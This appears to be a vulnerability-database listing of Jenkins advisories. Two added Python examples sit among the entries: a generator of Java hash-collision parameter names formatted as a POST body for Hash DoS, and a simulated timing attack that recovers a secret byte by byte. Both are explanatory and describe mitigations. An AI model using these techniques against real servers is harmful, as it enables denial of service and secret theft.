
CVSS: 5.4 | EPSS: 0% | CPEs: 2 | EXPL: 0

25 Mar 2020 — Jenkins 2.227 and earlier, LTS 2.204.5 and earlier does not properly escape node labels that are shown in the form validation for label expressions on job configuration pages, resulting in a stored XSS vulnerability exploitable by users able to define node labels. • http://www.openwall.com/lists/oss-security/2020/03/25/2 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •

CVSS: 8.8 | EPSS: 0% | CPEs: 2 | EXPL: 0

25 Mar 2020 — Jenkins 2.227 and earlier, LTS 2.204.5 and earlier uses different representations of request URL paths, which allows attackers to craft URLs that bypass the CSRF protection of any target URL. • http://www.openwall.com/lists/oss-security/2020/03/25/2 • CWE-352: Cross-Site Request Forgery (CSRF) •

CVSS: 7.8 | EPSS: 1% | CPEs: 4 | EXPL: 0

24 Feb 2020 — Hash collision attack vulnerability in Jenkins before 1.447, Jenkins LTS before 1.424.2, and Jenkins Enterprise by CloudBees 1.424.x before 1.424.2.1 and 1.400.x before 1.400.0.11 could allow remote attackers to cause a considerable CPU load, aka "the Hash DoS attack." • http://www.openwall.com/lists/oss-security/2012/01/20/8 • CWE-400: Uncontrolled Resource Consumption •
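How the "Hash DoS" class of attack works, as an added example in Python (not Jenkins or CloudBees code, and not taken from the advisory): the attacker precomputes many distinct strings with identical Java `String.hashCode()` values and sends them as request parameter names, so a chained hash table degrades to a linked list and each insert compares against every earlier key. The `"Aa"`/`"BB"` block trick, the `n_buckets` size and the POST-body shape are illustrative assumptions; the request format any given Jenkins endpoint parsed is not described on this page.

```python
import itertools

MASK32 = 0xFFFFFFFF


def java_string_hash(s: str) -> int:
    """Java's String.hashCode(): h = 31*h + c over the UTF-16 code units,
    wrapping at 32 bits and returned as a signed Java int.
    Only BMP characters are handled (one code unit per Python character)."""
    h = 0
    for ch in s:
        h = (31 * h + ord(ch)) & MASK32
    return h - (1 << 32) if h & 0x80000000 else h


def colliding_keys(n_blocks: int, blocks=("Aa", "BB")) -> list[str]:
    """Build 2**n_blocks distinct strings that all share one hashCode().
    "Aa" and "BB" both hash to 2112, and hash(s + t) == hash(s) * 31**len(t) + hash(t)
    (mod 2**32), so any concatenation of equal-length, equal-hash blocks collides too."""
    return ["".join(p) for p in itertools.product(blocks, repeat=n_blocks)]


def insertion_comparisons(keys, n_buckets: int = 1 << 16) -> int:
    """Model a chained hash table (bucket = hash & (n_buckets - 1)) and count how many
    existing entries each insert is compared against before being appended.
    Keys that all land in one bucket make the whole sequence O(n^2)."""
    buckets: dict[int, list[str]] = {}
    comparisons = 0
    for k in keys:
        idx = java_string_hash(k) & (n_buckets - 1)
        chain = buckets.setdefault(idx, [])
        comparisons += len(chain)   # one equality check per entry already in the chain
        chain.append(k)
    return comparisons


def form_body(keys) -> str:
    """Assumed shape of the attacker's POST body: each colliding key becomes a
    parameter name that the server inserts into its parameter map."""
    return "&".join(f"{k}=" for k in keys)


if __name__ == "__main__":
    evil = colliding_keys(12)                      # 4096 parameter names, one hashCode
    benign = [f"param{i}" for i in range(len(evil))]
    print(len({java_string_hash(k) for k in evil}), "distinct hash(es) across", len(evil), "keys")
    print("colliding inserts:", insertion_comparisons(evil))
    print("benign inserts:   ", insertion_comparisons(benign))
    print("payload bytes:    ", len(form_body(evil)))
```

With 4096 colliding names the model performs about 8.4 million key comparisons for a payload of well under 100 KB, against a few hundred for the same number of ordinary names; doubling the block count quadruples the work. The structural mitigations are the ones the JDK and web frameworks later adopted: randomized or tree-backed buckets for long chains (Java 8's HashMap treeifies bins of Comparable keys such as String) and a hard cap on the number of request parameters accepted.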

CVSS: 5.4 | EPSS: 1% | CPEs: 2 | EXPL: 0

29 Jan 2020 — REST API endpoints in Jenkins 2.218 and earlier, LTS 2.204.1 and earlier were vulnerable to clickjacking attacks. • http://www.openwall.com/lists/oss-security/2020/01/29/1 • CWE-1021: Improper Restriction of Rendered UI Layers or Frames •

CVSS: 5.4 | EPSS: 27% | CPEs: 2 | EXPL: 0

29 Jan 2020 — Jenkins 2.218 and earlier, LTS 2.204.1 and earlier exposed session identifiers on a user's detail object in the whoAmI diagnostic page. • http://www.openwall.com/lists/oss-security/2020/01/29/1 • CWE-200: Exposure of Sensitive Information to an Unauthorized Actor •

CVSS: 4.3 | EPSS: 0% | CPEs: 2 | EXPL: 0

29 Jan 2020 — Jenkins 2.218 and earlier, LTS 2.204.1 and earlier allowed users with Overall/Read access to view a JVM memory usage chart. • http://www.openwall.com/lists/oss-security/2020/01/29/1 • CWE-863: Incorrect Authorization •

CVSS: 5.3 | EPSS: 0% | CPEs: 2 | EXPL: 0

29 Jan 2020 — Jenkins 2.218 and earlier, LTS 2.204.1 and earlier did not use a constant-time comparison function for validating connection secrets, which could allow an attacker to use a timing attack to obtain such a secret. • http://www.openwall.com/lists/oss-security/2020/01/29/1 • CWE-203: Observable Discrepancy •

CVSS: 5.3 | EPSS: 0% | CPEs: 2 | EXPL: 0

29 Jan 2020 — Jenkins 2.218 and earlier, LTS 2.204.1 and earlier used a non-constant-time comparison function when validating an HMAC. • http://www.openwall.com/lists/oss-security/2020/01/29/1 • CWE-203: Observable Discrepancy •
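The two CWE-203 entries above (connection-secret validation and HMAC validation) share one root cause, so here is a single added example in Python of what a non-constant-time comparison leaks and how the attacker uses it. This is illustrative code, not Jenkins code: the secret value is constructed, and the "bytes inspected" counter returned by each comparison stands in for the elapsed time a remote attacker would actually measure.

```python
import hmac

# Constructed sample secret; stands in for a per-agent connection secret or an HMAC tag.
SECRET = b"s3cr3t-agent-key"


def leaky_equals(expected: bytes, supplied: bytes) -> tuple[bool, int]:
    """The weak pattern: return on the first mismatching byte.
    Returns (match, bytes_inspected); bytes_inspected is the side channel, because
    work done grows with how many leading bytes of the guess are correct."""
    if len(expected) != len(supplied):
        return False, 0
    for i, (x, y) in enumerate(zip(expected, supplied)):
        if x != y:
            return False, i + 1
    return True, len(expected)


def constant_time_equals(expected: bytes, supplied: bytes) -> tuple[bool, int]:
    """The fix: OR together the XOR of every byte pair and never exit early, so the
    work done is independent of where (or whether) the inputs differ."""
    if len(expected) != len(supplied):
        return False, 0
    diff = 0
    for x, y in zip(expected, supplied):
        diff |= x ^ y
    return diff == 0, len(expected)


def recover_secret(oracle, length: int) -> bytes:
    """Byte-by-byte recovery: at each position try all 256 values and keep the one
    that makes the comparison do the most work (or succeed outright).
    Costs 256 * length oracle queries instead of 256 ** length."""
    guess = bytearray(length)
    for pos in range(length):
        best = (-1, False)
        best_byte = 0
        for candidate in range(256):
            guess[pos] = candidate
            ok, steps = oracle(bytes(guess))
            if (steps, ok) > best:          # strictly greater: ties keep the first candidate
                best, best_byte = (steps, ok), candidate
        guess[pos] = best_byte
    return bytes(guess)


def demo() -> tuple[bool, bool]:
    """Run the attack against both comparison functions.
    Returns (recovered_from_leaky, recovered_from_constant_time)."""
    leaked = recover_secret(lambda g: leaky_equals(SECRET, g), len(SECRET))
    safe = recover_secret(lambda g: constant_time_equals(SECRET, g), len(SECRET))
    return leaked == SECRET, safe == SECRET


if __name__ == "__main__":
    print(demo())                                            # (True, False)
    # In real code use the library primitive rather than a hand-rolled loop:
    print(hmac.compare_digest(SECRET, b"s3cr3t-agent-key"))  # True
```

Against the early-exit comparison the full 16-byte secret falls to 4096 queries; against the constant-time version every candidate scores the same and the attacker learns nothing. Over a network the signal is a few nanoseconds per byte buried in jitter, so a real attack needs many samples per candidate and statistical filtering, which is why these entries carry a moderate CVSS rather than a critical one. Production code should call the platform primitive (`hmac.compare_digest` in Python, `MessageDigest.isEqual` in Java) instead of writing the loop by hand.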

CVSS: 5.8 | EPSS: 0% | CPEs: 2 | EXPL: 0

29 Jan 2020 — Jenkins 2.218 and earlier, LTS 2.204.1 and earlier was vulnerable to a UDP amplification reflection denial of service attack on port 33848. • http://www.openwall.com/lists/oss-security/2020/01/29/1 •

CVSS: 8.6 | EPSS: 0% | CPEs: 2 | EXPL: 0

29 Jan 2020 — Jenkins 2.213 and earlier, LTS 2.204.1 and earlier improperly reuses encryption key parameters in the Inbound TCP Agent Protocol/3, allowing unauthorized attackers with knowledge of agent names to obtain the connection secrets for those agents, which can be used to connect to Jenkins, impersonating those agents. • http://www.openwall.com/lists/oss-security/2020/01/29/1 • CWE-330: Use of Insufficiently Random Values •